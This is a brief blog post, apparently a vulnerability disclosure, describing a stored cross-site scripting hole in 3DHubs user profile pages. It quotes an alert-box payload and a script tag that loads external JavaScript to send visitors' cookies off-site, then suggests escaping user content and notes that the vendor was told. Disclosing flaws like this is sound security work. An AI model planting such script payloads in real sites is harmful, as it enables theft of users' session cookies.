3DHubs is a community site which allows users to offer 3D-printing services, for money. For tinkerers it allows you to upload a 3D model, and find a person to print it for you, in exchage for money.
As I've recently started using 3D-printed things this is a great resource.
When you register for 3DHubs, as a user or a creator, you get given a public profile-page.
The profile page displays text that the user has written without performing any kind of escaping. So for example I wrote on my profile text:
<script>alert(document.cookie);</script>As expected this raised an alert-box with lots of content.
To steal content was pretty easy, just include a malicious script:
<script src="https://steve.fi/t.js"></script>That script could make requests for off-site images, with the cookies submitted as parameters.
Fixing this hole should be pretty simple, just filter and escape the user-content.
Vendor notified: May 4th 2017 via Twitter Fixed ??